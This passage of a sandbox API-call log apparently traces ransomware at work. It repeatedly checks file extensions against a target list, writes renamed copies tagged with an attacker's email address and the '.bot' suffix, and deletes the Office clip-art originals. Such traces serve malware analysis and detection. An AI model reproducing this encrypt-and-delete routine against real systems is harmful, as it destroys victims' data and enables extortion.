	[0153.123] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.123] SetEndOfFile (hFile=0x388) returned 1
	[0153.123] CloseHandle (hObject=0x388) returned 1
	[0153.123] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.124] SetEndOfFile (hFile=0x3ac) returned 1
	[0153.126] CloseHandle (hObject=0x3ac) returned 1
	[0153.126] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.287] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099175.wmf")) returned 1
	[0153.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 63
	[0153.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 63
	[0153.288] lstrlenW (lpString=".doc") returned 4
	[0153.288] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.288] lstrlenW (lpString=".docx") returned 5
	[0153.288] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0153.288] lstrlenW (lpString=".pdf") returned 4
	[0153.288] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.288] lstrlenW (lpString=".xls") returned 4
	[0153.288] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.288] lstrlenW (lpString=".xlsx") returned 5
	[0153.288] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0153.288] lstrlenW (lpString=".ppt") returned 4
	[0153.288] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 63
	[0153.288] lstrlenW (lpString=".zip") returned 4
	[0153.288] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.288] lstrlenW (lpString=".rar") returned 4
	[0153.288] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.288] lstrlenW (lpString=".bz2") returned 4
	[0153.288] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.288] lstrlenW (lpString=".7z") returned 3
	[0153.288] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 63
	[0153.288] lstrlenW (lpString=".dbf") returned 4
	[0153.288] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 63
	[0153.289] lstrlenW (lpString=".1cd") returned 4
	[0153.289] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 63
	[0153.289] lstrlenW (lpString=".jpg") returned 4
	[0153.289] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 63
	[0153.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 63
	[0153.289] lstrlenW (lpString=".doc") returned 4
	[0153.289] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.289] lstrlenW (lpString=".docx") returned 5
	[0153.289] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0153.289] lstrlenW (lpString=".pdf") returned 4
	[0153.289] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.289] lstrlenW (lpString=".xls") returned 4
	[0153.289] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.289] lstrlenW (lpString=".xlsx") returned 5
	[0153.289] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0153.289] lstrlenW (lpString=".ppt") returned 4
	[0153.289] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 63
	[0153.289] lstrlenW (lpString=".zip") returned 4
	[0153.289] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.289] lstrlenW (lpString=".rar") returned 4
	[0153.289] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.289] lstrlenW (lpString=".bz2") returned 4
	[0153.289] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.289] lstrlenW (lpString=".7z") returned 3
	[0153.289] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 63
	[0153.290] lstrlenW (lpString=".dbf") returned 4
	[0153.290] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 63
	[0153.290] lstrlenW (lpString=".1cd") returned 4
	[0153.290] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 63
	[0153.290] lstrlenW (lpString=".jpg") returned 4
	[0153.290] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.290] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0153.290] lstrlenW (lpString="J0099180.WMF") returned 12
	[0153.290] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099180.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0153.291] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3394) returned 1
	[0153.291] CloseHandle (hObject=0x3d4) returned 1
	[0153.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099180.wmf")) returned 0x20
	[0153.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099180.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099180.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0153.291] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.291] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099180.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0153.293] GetLastError () returned 0x0
	[0153.293] ReadFile (in: hFile=0x3d4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xd42, lpOverlapped=0x0) returned 1
	[0153.497] WriteFile (in: hFile=0x1b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xd50, lpOverlapped=0x0) returned 1
	[0153.498] ReadFile (in: hFile=0x3d4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.498] WriteFile (in: hFile=0x1b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.498] SetEndOfFile (hFile=0x1b8) returned 1
	[0153.498] CloseHandle (hObject=0x1b8) returned 1
	[0153.498] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.498] SetEndOfFile (hFile=0x3d4) returned 1
	[0153.500] CloseHandle (hObject=0x3d4) returned 1
	[0153.500] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.500] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099180.wmf")) returned 1
	[0153.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 63
	[0153.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 63
	[0153.501] lstrlenW (lpString=".doc") returned 4
	[0153.501] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.501] lstrlenW (lpString=".docx") returned 5
	[0153.501] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0153.501] lstrlenW (lpString=".pdf") returned 4
	[0153.501] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.501] lstrlenW (lpString=".xls") returned 4
	[0153.501] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.501] lstrlenW (lpString=".xlsx") returned 5
	[0153.501] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0153.501] lstrlenW (lpString=".ppt") returned 4
	[0153.501] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 63
	[0153.501] lstrlenW (lpString=".zip") returned 4
	[0153.501] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.501] lstrlenW (lpString=".rar") returned 4
	[0153.501] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.502] lstrlenW (lpString=".bz2") returned 4
	[0153.502] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.502] lstrlenW (lpString=".7z") returned 3
	[0153.502] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 63
	[0153.502] lstrlenW (lpString=".dbf") returned 4
	[0153.502] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 63
	[0153.502] lstrlenW (lpString=".1cd") returned 4
	[0153.502] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 63
	[0153.502] lstrlenW (lpString=".jpg") returned 4
	[0153.502] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 63
	[0153.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 63
	[0153.502] lstrlenW (lpString=".doc") returned 4
	[0153.502] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.502] lstrlenW (lpString=".docx") returned 5
	[0153.502] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0153.502] lstrlenW (lpString=".pdf") returned 4
	[0153.502] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.502] lstrlenW (lpString=".xls") returned 4
	[0153.502] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.502] lstrlenW (lpString=".xlsx") returned 5
	[0153.502] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0153.502] lstrlenW (lpString=".ppt") returned 4
	[0153.502] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 63
	[0153.502] lstrlenW (lpString=".zip") returned 4
	[0153.502] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.502] lstrlenW (lpString=".rar") returned 4
	[0153.503] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.503] lstrlenW (lpString=".bz2") returned 4
	[0153.503] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.503] lstrlenW (lpString=".7z") returned 3
	[0153.503] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 63
	[0153.503] lstrlenW (lpString=".dbf") returned 4
	[0153.503] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 63
	[0153.503] lstrlenW (lpString=".1cd") returned 4
	[0153.503] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 63
	[0153.503] lstrlenW (lpString=".jpg") returned 4
	[0153.503] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.503] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0153.503] lstrlenW (lpString="J0099182.WMF") returned 12
	[0153.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099182.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0153.504] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3840) returned 1
	[0153.504] CloseHandle (hObject=0x3d4) returned 1
	[0153.504] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099182.wmf")) returned 0x20
	[0153.504] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099182.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.504] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099182.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0153.504] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.504] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.504] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099182.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0153.505] GetLastError () returned 0x0
	[0153.505] ReadFile (in: hFile=0x3d4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xf00, lpOverlapped=0x0) returned 1
	[0153.528] WriteFile (in: hFile=0x1b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xf10, lpOverlapped=0x0) returned 1
	[0153.529] ReadFile (in: hFile=0x3d4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.529] WriteFile (in: hFile=0x1b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.529] SetEndOfFile (hFile=0x1b8) returned 1
	[0153.529] CloseHandle (hObject=0x1b8) returned 1
	[0153.529] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.529] SetEndOfFile (hFile=0x3d4) returned 1
	[0153.531] CloseHandle (hObject=0x3d4) returned 1
	[0153.531] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.558] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099182.wmf")) returned 1
	[0153.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 63
	[0153.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 63
	[0153.680] lstrlenW (lpString=".doc") returned 4
	[0153.680] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.680] lstrlenW (lpString=".docx") returned 5
	[0153.680] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0153.680] lstrlenW (lpString=".pdf") returned 4
	[0153.680] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.680] lstrlenW (lpString=".xls") returned 4
	[0153.680] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.680] lstrlenW (lpString=".xlsx") returned 5
	[0153.680] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0153.680] lstrlenW (lpString=".ppt") returned 4
	[0153.680] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 63
	[0153.680] lstrlenW (lpString=".zip") returned 4
	[0153.680] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.680] lstrlenW (lpString=".rar") returned 4
	[0153.680] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.681] lstrlenW (lpString=".bz2") returned 4
	[0153.681] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.681] lstrlenW (lpString=".7z") returned 3
	[0153.681] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 63
	[0153.681] lstrlenW (lpString=".dbf") returned 4
	[0153.681] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 63
	[0153.681] lstrlenW (lpString=".1cd") returned 4
	[0153.681] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 63
	[0153.681] lstrlenW (lpString=".jpg") returned 4
	[0153.681] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 63
	[0153.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 63
	[0153.681] lstrlenW (lpString=".doc") returned 4
	[0153.681] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.681] lstrlenW (lpString=".docx") returned 5
	[0153.681] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0153.681] lstrlenW (lpString=".pdf") returned 4
	[0153.681] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.681] lstrlenW (lpString=".xls") returned 4
	[0153.681] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.681] lstrlenW (lpString=".xlsx") returned 5
	[0153.681] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0153.681] lstrlenW (lpString=".ppt") returned 4
	[0153.681] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 63
	[0153.681] lstrlenW (lpString=".zip") returned 4
	[0153.681] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.681] lstrlenW (lpString=".rar") returned 4
	[0153.682] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.682] lstrlenW (lpString=".bz2") returned 4
	[0153.682] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.682] lstrlenW (lpString=".7z") returned 3
	[0153.682] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 63
	[0153.682] lstrlenW (lpString=".dbf") returned 4
	[0153.682] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 63
	[0153.682] lstrlenW (lpString=".1cd") returned 4
	[0153.682] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 63
	[0153.682] lstrlenW (lpString=".jpg") returned 4
	[0153.682] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.682] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0153.682] lstrlenW (lpString="J0099187.JPG") returned 12
	[0153.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099187.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.683] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=24528) returned 1
	[0153.683] CloseHandle (hObject=0x3b4) returned 1
	[0153.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099187.jpg")) returned 0x20
	[0153.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099187.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099187.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.683] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.684] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099187.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0153.684] GetLastError () returned 0x0
	[0153.684] ReadFile (in: hFile=0x3b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x5fd0, lpOverlapped=0x0) returned 1
	[0153.751] WriteFile (in: hFile=0x3bc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x5fe0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x5fe0, lpOverlapped=0x0) returned 1
	[0153.793] ReadFile (in: hFile=0x3b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.793] WriteFile (in: hFile=0x3bc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.793] SetEndOfFile (hFile=0x3bc) returned 1
	[0153.793] CloseHandle (hObject=0x3bc) returned 1
